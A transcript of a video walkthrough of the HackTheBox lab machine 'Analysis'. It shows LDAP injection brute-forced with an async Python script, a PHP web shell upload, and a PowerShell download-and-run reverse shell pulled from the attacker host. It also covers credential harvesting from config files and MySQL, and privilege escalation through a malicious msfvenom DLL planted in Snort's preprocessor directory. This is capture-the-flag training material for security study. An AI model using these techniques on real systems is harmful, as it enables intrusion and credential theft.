What's going on YouTube? This is IPSec. I'm doing analysis from HackTheBox. And I'm not actually going to cover the intended route. We'll just cover the unintended route in this video. I know that may disappoint some people, but I think the intended route is going to be a better standalone video, and it works its way to be a standalone because it's doing some application hooking on just free software you can download. But before we get there, the box starts off with a lot of enumeration against a web server. You have to discover a virtual host, and then you do some fuzzing that goes into directories to find scripts. We're going to use FeroxBuster for that because recursive dir busting is really kind of needed for this box. If you just use GoBuster, it would take a really long time. But once you do all that enumeration, you discover a PHP script that is vulnerable to LDAP injection. And we're going to write a Python script using async in order to make this LDAP injection fast. And then with that, you get a shell to the box. You discover that Snort is running, and you can write inside one of the Snort directories that has all the DLLs it loads. So you just write a malicious DLL, and you get a shell as an administrator. We'll do a lot more just recon on the box after that. But with that being said, let's jump in. As always, we start off with an nmap, so -sc for default scripts, sv enumerate version, -vv for double verbose. This is going to put the TTL and things like that in the output. Then OA for output all formats, put in the nmap directory and call it analysis. Then the IP address of 10.10.11.250. This can take some time to run, so I've already ran it. Looking at the results, we have quite a few ports open. It looks like 13 since there's 987, we scanned 1,000. And the first thing I notice is simple DNS plus. Whenever I see that as the DNS server, I always look down, look at LDAP and see, yep, it is going to be Windows Active Directory. So we know we're dealing with an Active Directory box. When I see that, I normally look for 443, which I don't see, because if I see 443, chances are there may be like a certificate authority on this box, and we can do a bunch of those things, but there's nothing there. So let's move on. We have HTTP on port 80. And the odd thing here is I'm not seeing an IIS banner. It just says Microsoft HTTP API, which I'm not used to seeing. There could be something funky at play here. I wish I had more time to research this before doing the video, but it's something I would put more time in recon to figure out exactly why we're seeing this banner, right? We have Kerberos, a bunch of SMB type stuff going down. MySQL on 3306. That is a bit odd. We get unauthorized, so this host isn't allowed to talk to it. And then we have the host name, which is DC analysis, and the domain, which is analysis.htb. So let's go ahead and add both of these to our host file. So I'll do sudo v etc host, and then we can add 10, 10, 11 to 50, and then DC analysis. There we go. Add them both. And where do we want to start? I guess the first thing we could do is look at a netexec, right? See if there's any open shares. So I'll do netexec smb 10, 10, 11 to 50. And this is going to just tell us, yep, the host name is DC analysis. We get the Windows build, and that's about it. We can try like -- shares to see if we get anything. And I always like doing like a username of guest and a password of something. And then a username of something that doesn't exist, normally like period or something, just to see if there's any way we can get output. But it doesn't look like there is. So let's go ahead and take a look at the website. So if I go to 10, 10, 11 to 50, we get HTTP error 404 not found. If I go to HTTP analysis.htb, we get the actual page. So I want to check the headers of that real quick. Maybe this is the HTTP API and this one is IIS. I don't know, and it's just one of the things I want to put more research in. So I guess while I'm doing the video, might as well check it out, right? So if we send this request, oops, did not press Control R. There we go. Look at the server header. It is Microsoft IIS. If I take this host out, we get HTTP API. So it looks like that indicates there's some type of router in play, right? The default isn't IIS. It goes to the HTTP API. And then based upon your request, it's going to make some type of decision on where to send it. So that is my understanding right now why we saw that header difference. So looking at this website, we get not much actually. It's kind of weird that this whole thing is blank. I'm going to press Control U to look at the source. We have to turn the proxy off and see if we can identify like what it's built with or anything like that. It looks like it is just a static site. I don't see anything that indicates it's some type of CMS. We can look at like extensions. of what it is to see if there's anything interesting, but I don't see anything on this website. If we look at like all these links, it looks like all the links may be dead. So there's not much here. We can either go Buster for files, like find hidden files, or we can look for subdomains. The first thing I'm going to do is look for subdomains. So let's do a fuff. We'll use GoBuster, I guess. GoBuster vhost -u http analysis.htb wordlist ops seclist discovery DNS, and then what is it? Let's just do subdomains top 1,000,000 5,000.txt. And we'll see what we get here. It's in enumeration mode, but I guess what else could we check here? We could try like index.html. Is that what this is? It is. We could try like other extensions, right? File not found, PHP not found. So we did get a hit on internal.analysis.htb. So again, let's add this to our host file. So sudo v etc host, and then we'll add internal analysis.htb. Let's go check it. So internal analysis.htb, and we get a forbidden. We don't have any permission here. So there's really not much we can do here. We can wait for this GoBuster to finish. I guess we can look for files. And I'm going to see if there's any files in the internal site. Realistically, I would do them both, but that would take a little bit more time. There's nothing on analysis. We want to go here. Right now, the 403 forbidden, it could just be configured to block like any open directories, and there's no like index configured here. So we have to find any type of hidden directory or file, right? So I'll do GoBuster directory mode, u http internal analysis htb wordlist ops seclist discovery. Let's go with web content raft small words, and this is Windows. So I'm going to specify the lowercase because Windows is not case sensitive. And we get users redirects to user slash, so we know that is a directory, and we can show that real quick. Let me just put internal, analysis HTTP. Forbidden, right? If we went to users, it redirects us to users with a slash, and we get a 404, not found. But we want to show like Windows, not case sensitive. I put a capital R, capital U, S, like it all works. So using the lowercase in your word list really does speed up things. And I'm going to use a tool I don't use often in videos, but really I probably should. It's called FeroxBuster. It's a directory bruteforcer written in Rust, and it has recursion, right? Because I want to go and enumerate all these directories. I'd have to run multiple GoBuster commands, and I don't feel like doing that because it just takes a lot of time to run all those. So that's why I'm going to switch over to FeroxBuster, because it will be able to do that all at the same time. And the reason why I normally use GoBuster, not FeroxBuster, is because of the recursion, because this is always going to take a little bit longer. Let's do u internal analysis HTB word list. Let's put the same word list here. And then there's a step I don't like. One of the files in a directory is a PHP. I don't know how you know this Windows server runs PHP. Normally I would look for like the banner if I saw it running. I forget the super common web server on Windows that's not IIS. If I saw that as the server header, I'd guess PHP. But here, you kind of just have to go on a limb and look for PHP. So I'm going to cancel this one GoBuster. This is going to run. I wanted to actually do a output. Let's kill this state real quick. Because one thing you can do to kind of speed this up, we'll see it start running and then start finding a lot of directories we don't really care about, right? Like it's going in this JS, this CSS, this image, this uploads I probably care about, this lib. I don't care about a lot of those directories, like libchart. So I'm going to hit enter, and that brings us into the scan management. I'm going to do C for cancel, -F of 4, so it doesn't ask me if I want to cancel. And then we'll do 3, 4, 5. So we'll do 3 to 5. What was 5? 5 is image, yes. And then let's do 7 and 9. So we'll do 7, 9. And it's going to stop those threads, so it's not going to run the full word list there. And that kind of just speeds up the scan quite a bit. We have so far found 26 URLs. If I go to my out file, I think it will be shown. I guess maybe it gets written once it's done. We could kind of scroll up. Is there anything here I can do? Filters, get. Nope. I was hoping there was like a button I could just to show me all the pages it found, right? We could look for the 200s. So we have board upload.php. That is a 403. Let's see. We have employees login.php and dashboard tickets. Tickets redirects us to somewhere. We could try checking that out real quick, just see where it redirects us. So if we do dashboard tickets.php, was that what it was? What is that? Ticket? Dashboard tickets.php. It redirected us. It's not redirecting us. This is definitely it. We just get a 200 OK. The other one is employees login.php. So let's check this out. So if we go to employees login.php, we have the internal panel. So we could go, let's see, internal analysis, employees login. And then we do an email like root@ipsec.rocks. I can say password, single quote, or 1 = 1. The standard like SQL injection payload to see if we can log in that way. We can't. We don't have any emails really. And on the main page of analysis.htb, I didn't really see any like names here. So we don't have anything we can really do with this login form. Let's see, what other files do we have? Let's see, PHP. Employees, maybe we should just wait for this scan to finish. There's logout. So I guess I'm going to pause the video. We'll let this scan finish, and then we'll go through all the files that it found because I'm having trouble keeping track of it. And this is one of those reasons why I normally use GoBuster, because as it runs, you can keep better track of it, or at least I can. I'm sure there's a way to do it here. If my text probably wasn't so big, it may look better. Let's see, change profile default. That did not work. It does not like being changed in the middle of running. So maybe I don't have to pause the video. This is just about done. So you get an idea how long this takes. And then we'll see all the files it found. So if we cat, did I not do it? Oh God. I did not do -o FeroxBuster. Like, this is why I always create out files. Fero.out. We'll create that. I'm going to pause the video and we'll look at this when it's done. Okay, now that this is done, we can cat Fero.out. And I just want to see every PHP hit. So we looked at a lot of the dashboard stuff. There is this users list.php. So if we look at this, if we go here, what did I copy? The whole thing? I did. We have missing parameter. So we can just fuzz for parameters, right? So let's do that. I'm going to use fuff, then -u, put this URL, and then I'm going to guess it's a GET request. I'll do fuzz equals, we'll just do 1. And then for the word list, we'll use op sec list, discovery. Is there API? Discovery, web content. I always have trouble finding API. I think it's because the directory is lowercase. There we go. And then what do we want to see? We can say actions.text. Let's just see what that is. We can say -filter words for 2. We don't get anything. Let's just use raft small words. Discovery, web content, raft small words. We want to use lowercase. .text, and then we'll see if there's any endpoints here that come back. And we have name. So when we send name, something different happens. So let's do !name = 1, and we get this search result. We have username, contact underscore, last name, first name, something. So my first thought is let's try SQL injection. Let's see, I'm going to put this over to Burp Suite so it's a bit bigger and easier to read. Okay, so we have 1, and we can say or 1 equals 1. Like that. Let's see, we terminate, we can do, that should work. And we still just get that. We're not getting any good match. If we do like a wildcard, we get technician. So we get a result here. MySQL normally has wildcards as percents. LDAP has things as stars. So this looks like it's going to be an LDAP query. And based upon it being Active Directory, all these fields kind of make sense, like mobile, office, company, and whatever. If I put the star here on this page, we can see what forms are filled out. So at this, we can kind of guess at things. And I don't know if there's just one username or a lot of usernames. So we could go like A star and we get A Manson. We could do B star and get the next one. So I want to create a script to just enumerate all the users because for some reason this table only searches for one name. We can't get multiple names. So I want to dump a list of all usernames. So we're going to write a Python script to do that. Let's just do make dir enum, and we'll go in here and I'm going to call this LDAP users.py. And we're going to try coding this. It's going to be somewhat tough because I want to use async in order to make this go fast. So let's start it off by doing an import HTTPX, which is like the request library, just going to support asynchronous things. And then, of course, we have to import async IO. So let's start it off. I always like just creating a function called fetch. And this is just going to make a web request. So we do a client.get URL, and then we return with response. With async, when you say things with async, it just means it can the program can continue while this is working. And then with things like await, this is you don't want to continue until you get the response, right? If we didn't have the await here, we would just say response is equal to client.get. I think because it's asynchronous, it would potentially return response before this finishes. So that's why we use the await there. You just say awaits when you want to block the code. There's probably better explanations if you search on YouTube, but that's the quick one, right? So let's now create another function for LDAP. We'll call it search. And then we want to give it, let's see, we want to do a URL. And then what else do we want? Probably the character set that we're searching. And I'm going to call it negative match. And concurrency is equal to 8. So how this is working is we're going to pass it in a big character set. I'm going to import string. And we can say char set is equal to string ASCII lowercase. And we don't want digits. So we pass it in a big character set. It's going to create a loop, call fetch as many times as in the character set. And then negative match is going to tell us if the request was a match or not. And I'm doing negative because if we looked at the page and we gave it a bunch of junk, it returns with contact underscore. So that is how we know we get a negative match. So let's start this function off by doing a semaphore. And this is going to just limit us to whatever number of threads we have. It's defined as 8 by default. And then let's do an async definition of search. And then we'll give it a URL and then a single character and the negative match. And we'll say async with semaphore. That looks fine. Let's see. We want to give it the example URL. I'm just going to copy this so we have it. And this is what we're going to provide it. So let's see. We do await fetch URL plus we'll do C star. So we add whatever character it is. So if we have A, it'll search for A star, B star, whatever. Okay. And then let's see, if negative match is in response.text, we're going to return false. And then otherwise we will return the character. Okay. And that looks fine. So what this is going to do, it's going to take every single character and then run search against it and specifying each character. So we're going to run search. I think there's 24 characters. So we'll run search 24 times. And since it's asynchronous, it's going to just run concurrently, and it will block if there's currently 8 things running at a time. We're going to gather all the tasks. So we're going to use await to wait for every single task to be complete. And then we're going to return it. This will just create a list if there is a result. This results if R. This if R is going to ignore any falses we have. So now we can do our main function. So we'll do if name is equal to main. Okay. And let's see, the URL, it looks like it got that right, probably because we put it in the comment up here. Did not get the negative match right. That's not a surprise because we don't have it in a comment. If you're curious about all this autocomplete, that is GitHub Copilot. So now let's see, we're going to do the results. We're going to run that, and that looks good. So let's just hit F5, Python file, and we're going to run it and see where we screwed up, because I know we screwed up somewhere. We never get things right the first time. And of course, we're just returning the character. So we have 5 potential users here. What we want to do is right here where we return C, we want to look at the response and figure out how we can grab it. So if we did star and then looked at the source, let's see, I think it's technician. Yep. We just want to create some type of regular expression to grab this. I'm going to see how many times strong appears, only twice on the page. So we can grab everything between strong, and that's going to be the username. So let's go up here. We can import regex, and then we can say name is equal to re.find all. There's probably like a find one function. I just don't know off the top of my head. Not string, strong, and then we'll match everything up to /strong, and we'll turn name. That should be fine. We probably shouldn't check if like we didn't get a name, but that is probably good. I may want return name 0 actually. Yeah, because we did a double list. There we go. So here we're going to return the name. If there is a name, if there isn't a name, then it's going to return false. Run this. And there we go. We have it. So we have potentially 5 users. There could be more users, right? What if we had a BZ, right? Our thing isn't handling that because we just stop at the very first one. So what I want to do is go for all these names, and then we'll do a second search. I probably should have made this a set, but it's too late now. It'll be a pain to switch. So I'll say we'll do name in results. And the first character of the name is going to be that. And then the second character is going to be that. So what we can do is replace the character set. So we'll do temp char set is equal to char set. Oh, let's see. How do I want to do this? Because we could just replace the second character with nothing. And that essentially does it, right? Because when we rerun this, we'll never hit A Manson because we removed M from it. But I don't know if I want to do that because we should remove like everything up to M, right? So we can say, let's do a split. Let's do charset.split, and then we'll split on the second character and return the right side. So if our string was like A, B, C, D, E, F, and we had matched C, we're just splitting, removing that, and keeping D, E, F. So we resume the search after that. That should be fine. And let's see. We'll do URL plus first character. I think this is going to work. Let's see. Oh, I probably shouldn't have reused results like that. We'll do it this way. And I also, let's set a proxy so we can make sure the request looks fine. So if we want to do proxy, we can just say proxies is equal to HTTP localhost 8080. Run this. And then if we go in Burp Suite, look at history, we'll see it working in clumps of 8. And see timeout. We're getting a timeout issue because intercept is on. Let's run it. And that looks good. You can see how it's working. It is doing clumps of, or it looked like it was doing clumps of 8. It is pretty actually fast. If we wanted to test this out, we can remove the proxy real quick. Actually, let's just comment like that. And then this will be a quick way to do it. Python 3, LDAP, and we'll do a time and see how long this takes. 5 seconds. So let's do V. Let's change concurrency 8. We could just change it down here as well if we wanted to, but I have to change it in 2 places because we called it twice. Let's just say we'll do 16. And we'll see if it takes considerably less than 5 seconds. And it looks like the names are going definitely faster. Took 3 seconds there. So this is proof that our concurrency works like we think, right? If we want to do 32, this time it may not have much of a speed up. We'll see. Oh, 2 seconds. So that is how we can enumerate all the users. So what I want to do with this is we take them and I want to run like curb root, and we're going to see if they have any like AS rep roasting capabilities. So let's do v names.text, paste this in, opt, curb root. I think it's user enum. Yes, it is. User enum, DC 10.10.11.250, domain analysis, like that. I think that's right. Word names.text. I thought it was -w for word list. Maybe there's just no argument there. And we get valid usernames, but we don't have any hashes, so it's not AS rep roastable. I don't think this really got us anything. We can search the users to see if there's anything interesting in this. So let's go back to Firefox. We can search A Manson. We don't want to view source. We'll do A star. That is Andrew. B star. I'm just seeing if there's anything interesting in any of these fields. J star. And L star. We've already seen technician. So we don't have anything, which is a bit odd. We could test if this is like LDAP injectable, right? Another field, if this is Active Directory, would be description. So we should probably do this in Burp Suite. So we do the stir. LDAP puts just a bunch of queries just in parentheses, right? So I'm guessing this is going to be like, it looks like Sam account name is equal to this, right? This is going to be the query it's running, and it probably has like some other like OUs and groups beforehand to just do this search, right? So what we're going to specify is we're going to try closing out this. We just get table. So I'm guessing we cause an error in the script. And we can say description is equal to star as well. We don't get anything. Oh, we don't want to have the last end parenthesis because the script adds it. And we look at this, we get technician. So just like the username, we can brute force the description probably, right? Context star, like we want to go through a word list to see if there is a description. I wonder if star would match blank if there's not. Let's see, name, if we do a star, we don't have anything, T star. So if the description is blank, we'll get the contact word, right? So we know technician has a description. The first two users did not. J and L is the next two. We'll see if they do. One match, one match. So we know the technician has a description. We want to be able to exfil it, so we're going to do essentially the same thing. It's going to be a bit longer because we kind of have to recursively and go through every single character because we can only do it one character at a time, which is a bit of a pain, but we should be able to do it somewhat efficiently with the LDAP script. So we'll say LDAP, I will call this field.py. We're going to make it so we can do it in other fields if we wanted to, but the main one we want is just the description. So what we want to do is replace the URL first. I'm trying to think the best way to do this. Let's see. I'm not going to worry about arguments right now. We can maybe add it in later. You just import sys and whatever, but let's see. We want to do name. We'll say technician, and then description is equal to something. So that's going to be the URL now. And we're going to switch from a negative match to a positive match. And let's see, we'll call this name is equal to technician. And we can do it this way. That should make it easier for us to switch out later. And we don't even need to call it positive match. So the reason why we're switching is because we always know a positive result is going to have the technician. I didn't want to do contact because if we had like an error in a request and we broke something or something, then we'd see contact and we get a false match. So technician's only going to happen on positive match. So we should name this positive match and name it other places as well. This. If positive match is in response, then we want to return the character. And now we will return false. Okay. I'm going to change this up a lot as well. Because if I get a match, I don't want to keep going. So we want to break this up and do it in chunks, because how it's going now is we're going to run through the whole character set and then look at the results. But if we get a hit early, why do all the ones later, right? So let's break this up into chunks. So let's see, results, we'll declare that as a list. And then we can say for I in range 0, the length of the care set, and then we'll do a step of concurrency. That looks fine. I can't comprehend exactly what that is doing. Let's just break this up. So we'll say the batch is equal to care set. So this is going to go like the first 8 characters, then 9 through 16, whatever. Now we're going to loop through the batch, append to results. That looks fine. And then we want to gather all the results. We'll do for result in async IO as completed results. So this will process things as they finish. And then if we have data, return it. That should be fine. And if we don't, we want to clear them before we start the next batch. So all this did is break it up. So I guess we kind of broke the semaphore pattern, but I want to be able to return early. So if we hit it early in the word list, then we don't keep doing a request. I think that's fine. Okay, we do search, we add the character, name, URL. Let's just see what this happens. And we want to change the character set. This will be printable. We want to -5. The last 5 in printable is like line breaks and like non-print, like I don't think it's printable characters. We don't have regular expressions anymore. I'm trying to think, should we URL and quote this? Yeah, we probably should. From URL lib dot parse import quote. And we'll do quote C. So everything's going to be quoted. Okay. I'm curious what happens here. Run it. Are we going through Burp Suite? Oh, I screwed that up. We probably should have removed that. We got 9. Is that going to be the first character? So we did this. We had 9. We get a match. So now we want to go to do the next character, right? And it's got to just go and enumerate that. So let's see here. Let's see. How do I do this? We'll do while true. Also going to call this data. Okay. We have results. Let's see, URL char set name. That's fine. That did not return a list, which is good. So if results, we can say data plus equals results. And we probably want to update the URL as well. I wonder if we did this. Will the URL be smart enough to always update when we do this? Oh, we just want to print data. Let's see. We should hit D, 9. So I don't think it's smart enough to update the URL. We can look at Burp Suite at what it's doing. And yeah, it's not. So we want to say URL, redefine that. Let's see, does this work now? Nine, 7. This is looking better. So getting the password one character at a time. We probably could, or getting the data in the description. I leaked what we're doing, but a little bit of hindsight. The password for the user is in the description field. And we get just it ending here. And I don't think that's the password, right? We could go and grab this and then go, let's see, net exec -u technician -p that, and we also got to do SMB 10, 10, 11 to 50 and see what this says. Logon failure. So we probably had a bad character, and we could play around with this a little bit. So if I copy this, we go to Burp Suite, we go here, let's put this in, we get a match, and if we did 2 stars on anything, it just breaks completely, the whole page. So what if this password, like this field, was a star? Then we have to keep guessing going like this. And this is a huge pain. How you're supposed to escape wildcards is \2a, but that still doesn't work here. So we have to do something really, really odd to accommodate for wildcards and LDAP. One of the cool things, though, is if you have 2 wildcards, the first one doesn't behave as a wildcard. It just behaves as a character. So if we had this, then it'll only match as a character. It's not going to behave as another wildcard, which saves a lot of just, did we really match the next character? Do we match 2 characters from now because we have 2 wildcards? When you have 2, it only matches the last one. Weird, but that is the behavior. So we have to do something really, really wonky. I'm going to take the char set, and we're going to replace the star with nothing. So we just remove that from the character set because we don't even want to send this ever. Let's see. I'm going to remove this proxy so it just goes a little bit quicker. Okay. And then in this loop, this is where things get crazy. Let's see. Trying to think how I want to do this. I'm going to call another variable and loop is equal to false. And the purpose of this is to let us cycle through our list twice. If we don't get any hits, then it's going to run again. And if it runs again and then hits something, then we keep going. If it doesn't hit something, then we fail. So it has to go through the whole list twice, right? So what it's going to do is we hit this. It's going to loop through everything. We don't get a hit. So it's just going to magically append a asterisk and then go through brute forcing it again. So that's the whole logic there. There's probably a better way to do it, but it's one of those weird things. I didn't know of a good solution. So we'll do on the else, we'll say if and loop, then we'll break. And if it's not set to true, we will set it to true. And then we will append data as star. And we will print. And then in this result, we just want to also say end loop is equal to false. That may be all we need to do. Let's run it again and see. So we're running it, and come on, 9, 7, N, T. So we should loop through everything. And it broke. I don't know why. let's see, let's set a breakpoint here. Let it run. I guess we could speed it up by giving it a few characters first. Okay, so we added data. Then we should go back to results. And now, oh, I'm not going through Burp Suite anymore, because I want to see the request easily. So my breakpoint, right? I do. Proxy history 97N tthe. We should be broken. We're not getting any request. So I'm going to step over. And then we run this again. We should get a new batch. And what are you searching? It didn't append. I know. We did not reset the URL. There we go. Now this should work. (97N ttl) should just print a star and keep going. We didn't do a print here, but if we look, you can see what it's doing. We're getting each character there. So we had the star, and it ended with a star. That's probably not it. We just did a bad job printing. So let's see. How do we want to handle this? I just want to clean this up a little bit. It shouldn't take too long. Let's see. We can say if end loop. So if end loop is set to true currently. Then we want to print out the star. So we'll move the print function up to here. And we're always going to have to set flush to true. So we don't have to worry about printing here. We can append data. That looks fine. Where are we doing the first print? I think I erased it already. So if end loop, print star. Let's see, how else can I do this? I'm going to do print. What are we adding? Results. How's that look? And at the end, we'll just print a new line. Does this do it? 9.7. This looks better. Come on. Star. There we go. So this is looking much better. Now, as long as we have everything in the character set, we should be good. So if I copy this, let's right click, copy. Then we can go back here, put this password in. And we still get a login failure. I wonder if there's another character we are missing, or if this is not like a Windows password. We did have an employee's login. Let's try this real quick. And if this doesn't work, we probably have something messed up in our script. We're not getting a character. So we can say technician at, what is it? Analysis.htb. Put in that password. Bad data. So we have something wrong with our script, I think. Let's head over to Burp Suite and look at what it's guessing and what it thinks. 97NTTL star 4Q. Oh, we're missing a 4. When I do this print, we also need to add the results. Because when we hit this, we just magically added the star to data, right? And it's just doing a second guess. So it's doing 2 at once, and we only printed 1. So that is, I think, the mistake there. If we add that in, hopefully we get a different result. So let's see. 97 N T T L. This should be star 4. There we go. So that makes sense. If we add the 4, let's see. We do get a hit. We can try accessing the shares or see if there is any. We could probably run Bloodhound or something from this now, but I'm not going to do it just yet. There we go. We go back to the login page, technician@analysis.htb, put in the password. I did not have the 4 in. Hopefully I'm not making a typo. There we go. We can log in. I'm going to fix up the script real quick because that should not take long. Let's see. That looks fine. All we want to do is be able to change the description and field. So let's do import sys. And we can say name is equal to sys argv 1, and then field is equal to sys argv 2. If length of does not equal 3, then name is equal to technician, field is equal to description. I think that's good. So we got name, field. Let's see if that works real quick. Python 3, LDAP field, technician, description. That looks good. And let's see exactly how long this takes to run. We could also simplify this. That should also work. What is my concurrency at? We're at 32. So if I do time on this, we can see how long it takes to actually run. I'm going to guess 8 seconds. And then I want to run it with 12 threads and see if it's actually quicker. I don't think it will be. But it's possible it could be just because of how we're doing the blocking. So we'll run it again with 12. See how long this takes. I guess we could also run it at like 128 to see. That's going to be longer than the character set, but we'll see if that overloads it or not. This looks like it's about the same. 25 seconds, what was the last one? 19. So if we did 128, let's just see. You can see the first characters seem to take slower. I think that's just, oh, we had some type of error. I don't know if that actually screwed anything up magically enough. I think it errored on a bad, like on non-valid character anyways, so I don't think it messed anything up, and it's going along. We have 29 seconds. So you can see always just setting the threads as high as possible isn't always good, right? So there's some more optimization that could be done, but that is enough for this script. Were we going through Burp Suite? We were. Let's do 32 without Burp Suite. I think Burp Suite will also slow this down considerably. Yeah. So we can see this is going much, much quicker if we don't intercept it. I'll try 128 again, and then we'll move on. Sorry for wasting your time here. I'm curious. Wow, that was like double the speed. So description before, it took 30 seconds. And it looks like maybe it was just going slow because Burp Suite couldn't handle that many connections. It's going fine when we're just talking straight to IIS. So that's going to wrap up the LDAP injection piece. Now let's go and see what we can do with this analysis panel. Looking through this, it doesn't really have anything interesting here. If we go to tickets, Active Directory login issues, HTA files, if we click details, does it have anything? Get weird errors. Let's go to SOC Report. Files will be executed in a sandbox and analyzed by an analyst. Let's just try putting a file here. Let's go to HTB, analysis. Whoops. HTB, analysis. I'm just going to upload names.txt. And let's make sure this goes through Burp Suite. Proxy, intercept on, upload sample, send it to repeater, and it just says uploads names.txt. So let's try making a request there. And we get the file. So we know this is PHP. Let's try uploading a PHP file. So let's change the file name to call it shell.php. And let's just run a system command. We'll do system who am I first, and then we'll add it so we can do arguments to get a reverse shell. There we go. Shell.php exists. And we're analysis.serviceweb. Awesome. So let's make this just execute command. So we can say request cmd like that. So now we can pass it a command. So we could do like cmd is equal to who am I /all. If we put this in view source, we can see all the privileges we have. Doesn't look like anything too sensitive, but we can get a reverse shell from this. So let's switch over to Burp Suite, because I always like doing this over in a post request, because there's less bad characters. So let's change the request to method. And then we want to do PowerShell IEX, new object, net.web client, download string, HTTP 10.10.14.8, shell.ps. And we're going to specify port 8000, and we want to make that file. And before we go on, we probably should highlight and URL encode. So let's go up a directory, make dir, www, cp user share nashang, PowerShell, or is it shells, invoke, PowerShell TCP, one line. Okay. I'm just going to move this to shell.ps, and let's edit it to put this. And hopefully there's no antivirus on the box. If there is, then we have to do some light evasion. If you don't know how to do it, you can go to ipsec.rocks, where I've done it in other videos. That looks fine. Let's do nclvnp 9001, Python 3, HTTP server. Run this. We see the request made, and it looks like we have a shell. I forgot to do RL wrap. I always like doing that on my Windows reverse shell, so let's add that in. run it, because that gives me the up and down arrows. So now we have a shell on the box. And the first thing I always like doing when I pop a web server is harvest any credentials from the application. The first thing that comes to mind is going to be the login form, because that has to talk to something in order to authenticate, right? So let's go to employees, and then let's look at login.php. And let's see, that is just HTML. If we scroll up, we have it doing the login right here. So we have host, localhost, username, DB master, then that password, employees. So we can try logging into MySQL. And I think from the nmap, we got like the host isn't allowed to talk to it, but maybe with the user we can. So let's do MySQL-u. We'll tell it we have a password. I want to say is it capital or lowercase h for host? I think 1010 11 250. It may be lowercase. We'll see. Nope. It's asking for the password now. Let's copy this, paste it in, and it's not going to that host. Let's do lowercase h. Paste it in, and can we not talk to it? The host 10.10.14a is not allowed to talk to this server. So we could just upload chisel and pivot so we access MySQL over localhost, but we've done that in a lot of boxes. I don't feel like showing it again. Another thing you can do is always just write a quick PHP script to dump the data, and then you don't have to do any pivoting. So let's show that real quick. I'm going to copy this field, and then we'll go here. Let's go in www. I'm going to call this dump.php, and I want to paste this. I'm not going to bother with the try. I wonder if I should have just done this in VS Code. Let's see. We dump database. That looks fine. So after we connect, we want to give it the SQL command. So we'll do SQL select star from, and is it users? What do they call the database or the table? It looks like members. I'm looking right here. So we'll do select star from members, and then we have to execute the statement. So let's just say statement is equal to the connect prepare SQL. There we go. That's why I didn't tab auto do my indenting right that time. So after this statement connect prepare, we have to execute it. Okay. And then we can say for each, did I spell that right? I did not. There we go. Results as row. And we can just echo. I wonder if I can do just a array. And then we will append a line break. I think this is right. Let's close out the PHP. Let's see if it magically works. I'm not exactly positive. I'm going to go in the uploads folder because I know I can write there. I could probably write anywhere, but I'd rather just do it here. We'll do a wget 10.10.14.8 8000 dump.php -o dump.php. Then we curl 10.10.4. Let's just go back here. Change this to a get dump.php. Undefined variable results. Let's see. Results. We did statement to execute. I need to fetch. Results is equal to statement fetch all. What is it? Do they have it in this? Catch PDO. We execute. think it's PDO fetch associated. Try that. Array to string conversion. PHP dump array. I forget this command. Var dump. That's it. Try this. There we go. So we have, I guess, just technician's password. There's only one user here. So that doesn't really get us anything new, but hey, we did something cool. The odd thing, though, is we did LDAP injection. This is all talking through MySQL. So let's go back a step and go to, was it users? And then list.php. And see if how it talks to LDAP. So it's doing the query here. There's got to be a bind as a user. And we have another password. We have this one. So we probably should have saved all the passwords. Let's do v creds.text. We can say this. What user is this? Web service. So we can get this account. We can also get the database. So we'll say db master. And that is in a PHP script. So we'll cat dump and grab this. And I guess technician. And we had this from the LDAP dump command, right? Did it end in V? Yes. Okay. So we poked at the web application. It didn't really get us all that much. We could try logging in as these users. I'm not actually sure what web service has access to. We could try, let's see, net exec or nxc, smb 10 10 11 250 u. Was it web service? And P. See if it logs in. It does, but it doesn't have SMB, or it can't like get a shell. We could try like winrm to see if this user could access the box over winrm. It can't. We could also just do like a net user command, dump all the users, and then try replaying other passwords we have and see if we can log in. But none of that's really too important. If we went to cd/ and did a dir, we would see a directory that is really non-standard, Snort. And there's also a Snort log that is relatively big. But if we go into the Snort directory and then look at, let's see, what do we have? We have bin, etc, lib, log, rules. I'm going to go into logs. And if we do a dir, we can see it's running about every 2 minutes. And there is a library directory. And if we look at exactly what the purpose of this dynamic preprocessor directory is, let's see, Snort, this. I'm going to Google man as well. Let's see if this goes up to the top. Let's see. That did not. Dynamic preprocessor. There we go. The Snort manual has dynamic modules. And essentially, if the config is said to point to this directory any DLL inside of it is going to be loaded, right? It tells Snort to load the dynamic preprocessor shared library. So we want to look at the Snort config file now and see if this is set. So let's go into Etsy, and then we can look at snort.conf. And then I'm going to search up for dynamic preprocessor, and we see it's going to this directory. The dynamic engine is just going to the dynamic engine and specifies the full DLL. But since this is just specifying the directory, anything in here will be loaded when Snort runs. So let's just see if we can write into this directory. So I'm going to echo test to test, do a dir, and we have successfully wrote to the directory. So all we have to do is make a DLL and upload it here. So I'm going to use MSF Venom for that. So do MSF Venom -L payloads. I actually think I may know the syntax. MSF Venom -P Windows x64 reverse shell TCP, I think. lhost 10.10.14.8. L port 9001. What else do we need? We need to specify format DLL and -out. We'll call it ipsec.dll. I think that's it, right? Reverse shell TCP. It did not find anything. Is it shell reverse? It is. Almost knew it. So I think that should create us a reverse shell that will just be a DLL. So when this runs, I'm going to run a file against it and just double check that it is indeed a DLL. Let's do file ipsec DLL, PE, yep, Windows DLL. So I'm going to move this into www, and then let's wget it. So wget 10.10.14.8, 8000, ipsec DLL, out file ipsec DLL. And then nc lvnp 9001. I probably should rl wrap that. And if we look at the date, it is running every 2 minutes, 1837. Let's see. Oh, we gotta go into logs. Is it just log? 1837 looks like it ran. We don't have a shell. Maybe I did it like at the 2-second mark after it ran. The other thing this could be is maybe it's a 32-bit version of Snort. We did not check the architecture. I don't know how to just quickly check that on PowerShell. So I think I'm going to just wait 2 minutes and see what happens. So let's do a sleep 120, and I'm going to pause the video and we'll come back when this finishes. And the 2 minutes hasn't passed up, but we did get a shell. And if we do a who am I, we are the administrator user. And I knew I'd get administrator when I exploited Snort because Snort has to listen on a network interface, and normally people don't do granular permissions. They just give administrator so it can do that. So if we want to users administrator desktop, cd users, where is the administrator? Oh, it's administrator because the box is in a different language. cd desktop, and we can get root.txt. This is the unintended way of the box. I'm not actually going to cover the intent in this video because I think it's going to be better for a standalone video because it's going to be doing a bunch of DLL injection with a binary you can just download, right? So I'm going to do the root that way. But we can cover up to that point, right? Because this whole Snort thing, not really intended. We're supposed to get another user's password, and you can get that user's password 2 ways. The easiest way is just to run linps or winps. So if we go download winps, so I'm just going to do github winps, and let's download this. Let's see, we probably got to go up a few directories because we got linked to README. Let's see, latest downloads. Tutorial. Scripts and binaries on the release page. WinPs 64 exe. I'm going to go in dub, do a wget. Okay. We can go in a directory we can write to. I like using program data because it exists on every Windows box. So we can always be confident we can write there. Normally 